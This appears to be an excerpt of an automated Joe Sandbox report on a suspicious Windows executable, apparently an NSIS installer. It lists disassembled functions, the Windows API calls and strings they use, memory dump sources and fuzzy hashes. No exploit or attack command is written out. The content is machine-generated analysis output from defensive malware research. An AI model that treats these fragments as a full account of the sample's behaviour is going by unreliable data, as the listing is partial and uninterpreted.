                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                          • API String ID: 2246997448-4037518227
                                                          • Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                          • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                          • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                          • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                          Function 00404337 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: Call$N$open
                                                          • API String ID: 3615053054-2563687911
                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                          Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          Function 004061DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3963005831
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsrF34D.tmp$C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll
                                                          • API String ID: 1453599865-3208193370
                                                          • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                          • String ID:
                                                          • API String ID: 3294113728-0
                                                          • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                          • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(00026166,00000064,00029799), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
